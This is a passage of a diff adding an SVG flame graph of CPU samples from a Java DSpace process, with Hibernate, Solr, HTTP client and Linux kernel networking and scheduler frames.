+<title>iptable_raw_hook (1 samples, 0.08%)</title><rect x="90.5" y="581" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="93.54" y="591.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (26 samples, 2.06%)</title><rect x="1165.7" y="805" width="24.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.65" y="815.5" >[..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.08%)</title><rect x="843.5" y="453" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (9 samples, 0.71%)</title><rect x="810.7" y="453" width="8.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="813.71" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/TwoPhaseLoad:::doInitializeEntity (1 samples, 0.08%)</title><rect x="781.7" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="784.68" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="785.4" y="453" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/criterion/SimpleExpression:::toSqlString (1 samples, 0.08%)</title><rect x="1012.1" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1015.06" y="415.5" ></text>
+</g>
+<g >
+<title>ipv4_conntrack_local (2 samples, 0.16%)</title><rect x="91.5" y="581" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="94.48" y="591.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/TypedValue:::hashCode (1 samples, 0.08%)</title><rect x="748.9" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="751.90" y="415.5" ></text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.08%)</title><rect x="518.5" y="325" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="521.52" y="335.5" ></text>
+</g>
+<g >
+<title>sk_filter_trim_cap (1 samples, 0.08%)</title><rect x="97.1" y="325" width="0.9" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="100.10" y="335.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyAsType (3 samples, 0.24%)</title><rect x="1138.5" y="501" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1141.49" y="511.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.08%)</title><rect x="790.1" y="277" width="0.9" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="793.11" y="287.5" ></text>
+</g>
+<g >
+<title>__wake_up_common_lock (1 samples, 0.08%)</title><rect x="98.0" y="261" width="1.0" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="101.03" y="271.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (1 samples, 0.08%)</title><rect x="867.8" y="485" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.84" y="495.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (1 samples, 0.08%)</title><rect x="1140.4" y="373" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1143.37" y="383.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (1 samples, 0.08%)</title><rect x="839.7" y="453" width="1.0" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="842.75" y="463.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (10 samples, 0.79%)</title><rect x="243.2" y="405" width="9.4" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="246.19" y="415.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (35 samples, 2.78%)</title><rect x="84.0" y="837" width="32.8" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="86.98" y="847.5" >do..</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::readFrom (1 samples, 0.08%)</title><rect x="782.6" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (12 samples, 0.95%)</title><rect x="792.9" y="469" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.08%)</title><rect x="783.6" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.56" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1006.4" y="373" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1009.44" y="383.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="821" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="831.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (3 samples, 0.24%)</title><rect x="862.2" y="389" width="2.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="865.22" y="399.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (48 samples, 3.81%)</title><rect x="14.7" y="645" width="44.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="17.68" y="655.5" >inte..</text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::hydrate (1 samples, 0.08%)</title><rect x="774.2" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="777.19" y="415.5" ></text>
+</g>
+<g >
+<title>visit_groups_merge (1 samples, 0.08%)</title><rect x="114.9" y="709" width="0.9" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="117.89" y="719.5" ></text>
+</g>
+<g >
+<title>do_softirq.part.0 (17 samples, 1.35%)</title><rect x="94.3" y="533" width="15.9" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="97.29" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (3 samples, 0.24%)</title><rect x="252.6" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="255.56" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="531.6" y="373" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="534.63" y="383.5" ></text>
+</g>
+<g >
+<title>put_prev_entity (1 samples, 0.08%)</title><rect x="518.5" y="309" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="521.52" y="319.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.08%)</title><rect x="114.9" y="725" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="117.89" y="735.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::hashCode (1 samples, 0.08%)</title><rect x="819.1" y="501" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="822.14" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (130 samples, 10.32%)</title><rect x="1013.0" y="453" width="121.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1016.00" y="463.5" >org/hibernate/e..</text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%)</title><rect x="817.3" y="229" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="820.27" y="239.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="325" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::evict (1 samples, 0.08%)</title><rect x="756.4" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.40" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="309" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="319.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.08%)</title><rect x="841.6" y="485" width="1.0" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="844.62" y="495.5" ></text>
+</g>
+<g >
+<title>org/dspace/text/filter/LowerCaseAndTrim:::filter (1 samples, 0.08%)</title><rect x="868.8" y="485" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="871.78" y="495.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.08%)</title><rect x="758.3" y="293" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="303.5" ></text>
+</g>
+<g >
+<title>__cgroup_bpf_run_filter_skb (1 samples, 0.08%)</title><rect x="97.1" y="309" width="0.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="100.10" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::getCollectionEntry (1 samples, 0.08%)</title><rect x="1111.3" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1114.33" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (79 samples, 6.27%)</title><rect x="579.4" y="437" width="74.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="582.40" y="447.5" >org/hibe..</text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.08%)</title><rect x="1124.4" y="405" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="415.5" ></text>
+</g>
+<g >
+<title>__sched_text_start (12 samples, 0.95%)</title><rect x="1178.8" y="725" width="11.2" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1181.76" y="735.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_in (1 samples, 0.08%)</title><rect x="91.5" y="565" width="0.9" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="94.48" y="575.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (1 samples, 0.08%)</title><rect x="817.3" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="820.27" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/AbstractHttpClientConnection:::sendRequestEntity (1 samples, 0.08%)</title><rect x="815.4" y="357" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (125 samples, 9.92%)</title><rect x="135.5" y="421" width="117.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="138.49" y="431.5" >org/hibernate/..</text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.08%)</title><rect x="788.2" y="357" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="367.5" ></text>
+</g>
+<g >
+<title>pthread_mutex_lock (1 samples, 0.08%)</title><rect x="313.4" y="373" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="316.43" y="383.5" ></text>
+</g>
+<g >
+<title>[libjli.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="853" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="863.5" >[libjli.so]</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentBag:::isEmpty (1 samples, 0.08%)</title><rect x="761.1" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.08%)</title><rect x="788.2" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="958.7" y="405" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="961.68" y="415.5" ></text>
+</g>
+<g >
+<title>timekeeping_advance (1 samples, 0.08%)</title><rect x="990.5" y="213" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="993.52" y="223.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/criteria/CriteriaJoinWalker:::&lt;init&gt; (6 samples, 0.48%)</title><rect x="1007.4" y="453" width="5.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1010.38" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/WrapVisitor:::processValue (4 samples, 0.32%)</title><rect x="728.3" y="437" width="3.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="731.30" y="447.5" ></text>
+</g>
+<g >
+<title>java (1,260 samples, 100.00%)</title><rect x="10.0" y="885" width="1180.0" height="15.0" fill="rgb(224,86,86)" rx="2" ry="2" />
+<text  x="13.00" y="895.5" >java</text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getBitstreams (2 samples, 0.16%)</title><rect x="782.6" y="485" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::hasQueuedOperations (1 samples, 0.08%)</title><rect x="125.2" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="128.19" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/java/AbstractTypeDescriptor:::areEqual (1 samples, 0.08%)</title><rect x="1062.6" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1065.63" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (2 samples, 0.16%)</title><rect x="1138.5" y="469" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1141.49" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (1 samples, 0.08%)</title><rect x="1139.4" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1142.43" y="447.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (12 samples, 0.95%)</title><rect x="1178.8" y="645" width="11.2" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1181.76" y="655.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::removeEntity (1 samples, 0.08%)</title><rect x="663.7" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="666.68" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (12 samples, 0.95%)</title><rect x="792.9" y="501" width="11.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="795.92" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRow (3 samples, 0.24%)</title><rect x="773.3" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="776.25" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::extractKeysFromResultSet (2 samples, 0.16%)</title><rect x="771.4" y="437" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="774.38" y="447.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.08%)</title><rect x="318.1" y="453" width="0.9" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="321.11" y="463.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.08%)</title><rect x="817.3" y="373" width="0.9" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="820.27" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/collection/AbstractCollectionPersister:::getElementPersister (1 samples, 0.08%)</title><rect x="659.9" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="662.94" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (56 samples, 4.44%)</title><rect x="444.5" y="421" width="52.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="447.54" y="431.5" >org/h..</text>
+</g>
+<g >
+<title>tick_sched_do_timer (1 samples, 0.08%)</title><rect x="990.5" y="261" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="993.52" y="271.5" ></text>
+</g>
+<g >
+<title>org/dspace/sort/OrderFormat:::makeSortString (1 samples, 0.08%)</title><rect x="868.8" y="501" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="871.78" y="511.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::encode (1 samples, 0.08%)</title><rect x="809.8" y="421" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="812.78" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.08%)</title><rect x="797.6" y="149" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="159.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/descriptor/sql/BasicExtractor:::extract (2 samples, 0.16%)</title><rect x="771.4" y="421" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="774.38" y="431.5" ></text>
+</g>
+<g >
+<title>JNU_NewStringPlatform (1 samples, 0.08%)</title><rect x="790.1" y="341" width="0.9" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="793.11" y="351.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.08%)</title><rect x="1138.5" y="389" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1141.49" y="399.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.08%)</title><rect x="817.3" y="405" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="820.27" y="415.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/bitstore/DSBitStoreService:::get (1 samples, 0.08%)</title><rect x="797.6" y="213" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="800.60" y="223.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::setOwner (1 samples, 0.08%)</title><rect x="913.7" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="916.73" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::handleResponse (1 samples, 0.08%)</title><rect x="1157.2" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.22" y="447.5" ></text>
+</g>
+<g >
+<title>sun/reflect/DelegatingMethodAccessorImpl:::invoke (2 samples, 0.16%)</title><rect x="777.0" y="469" width="1.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="780.00" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (1 samples, 0.08%)</title><rect x="761.1" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.08" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/OuterJoinLoader:::getCollectionPersisters (1 samples, 0.08%)</title><rect x="760.1" y="357" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="763.14" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/util/collections/IdentityMap:::entryArray (5 samples, 0.40%)</title><rect x="568.2" y="437" width="4.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="571.16" y="447.5" ></text>
+</g>
+<g >
+<title>sun/nio/cs/UTF_8$Encoder:::encode (1 samples, 0.08%)</title><rect x="809.8" y="405" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="812.78" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (1 samples, 0.08%)</title><rect x="1136.6" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1139.62" y="399.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::doCreateBean (3 samples, 0.24%)</title><rect x="1135.7" y="453" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (1 samples, 0.08%)</title><rect x="815.4" y="325" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.08%)</title><rect x="779.8" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="782.81" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.08%)</title><rect x="431.4" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="434.43" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/criterion/LogicalExpression:::toSqlString (1 samples, 0.08%)</title><rect x="1012.1" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1015.06" y="431.5" ></text>
+</g>
+<g >
+<title>prepare_exit_to_usermode (1 samples, 0.08%)</title><rect x="553.2" y="421" width="0.9" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="556.17" y="431.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (6 samples, 0.48%)</title><rect x="856.6" y="373" width="5.6" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="859.60" y="383.5" ></text>
+</g>
+<g >
+<title>java/io/ByteArrayInputStream:::read (1 samples, 0.08%)</title><rect x="1159.1" y="309" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1162.10" y="319.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (283 samples, 22.46%)</title><rect x="869.7" y="517" width="265.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="872.71" y="527.5" >org/dspace/discovery/SolrServiceRes..</text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="1096.3" y="421" width="1.0" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1099.35" y="431.5" ></text>
+</g>
+<g >
+<title>find_busiest_group (1 samples, 0.08%)</title><rect x="59.6" y="661" width="1.0" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="62.63" y="671.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (1 samples, 0.08%)</title><rect x="870.7" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="873.65" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/ContentStreamBase$StringStream:::getStream (1 samples, 0.08%)</title><rect x="809.8" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="812.78" y="447.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.08%)</title><rect x="87.7" y="645" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="90.73" y="655.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.08%)</title><rect x="817.3" y="261" width="0.9" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="820.27" y="271.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc/PgStatement:::executeInternal (1 samples, 0.08%)</title><rect x="313.4" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="316.43" y="431.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (2 samples, 0.16%)</title><rect x="1161.0" y="405" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1163.97" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/StringBody:::writeTo (1 samples, 0.08%)</title><rect x="1149.7" y="293" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration$1:::entrySet (2 samples, 0.16%)</title><rect x="845.4" y="405" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.37" y="415.5" ></text>
+</g>
+<g >
+<title>__handle_irq_event_percpu (1 samples, 0.08%)</title><rect x="1124.4" y="325" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="1127.44" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionFactoryImpl:::getCollectionPersister (1 samples, 0.08%)</title><rect x="1133.8" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.81" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1,118 samples, 88.73%)</title><rect x="118.6" y="661" width="1047.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="121.63" y="671.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>ip_finish_output (19 samples, 1.51%)</title><rect x="93.3" y="597" width="17.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="96.35" y="607.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/DefaultClientConnection:::sendRequestHeader (1 samples, 0.08%)</title><rect x="1160.0" y="373" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1163.03" y="383.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (3 samples, 0.24%)</title><rect x="1158.2" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1161.16" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::append (1 samples, 0.08%)</title><rect x="757.3" y="533" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="760.33" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (10 samples, 0.79%)</title><rect x="767.6" y="469" width="9.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="770.63" y="479.5" ></text>
+</g>
+<g >
+<title>__cgroup_account_cputime (1 samples, 0.08%)</title><rect x="518.5" y="277" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="521.52" y="287.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::getEntityName (1 samples, 0.08%)</title><rect x="1123.5" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1126.51" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentBag:::iterator (1 samples, 0.08%)</title><rect x="785.4" y="485" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="495.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (4 samples, 0.32%)</title><rect x="259.1" y="421" width="3.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
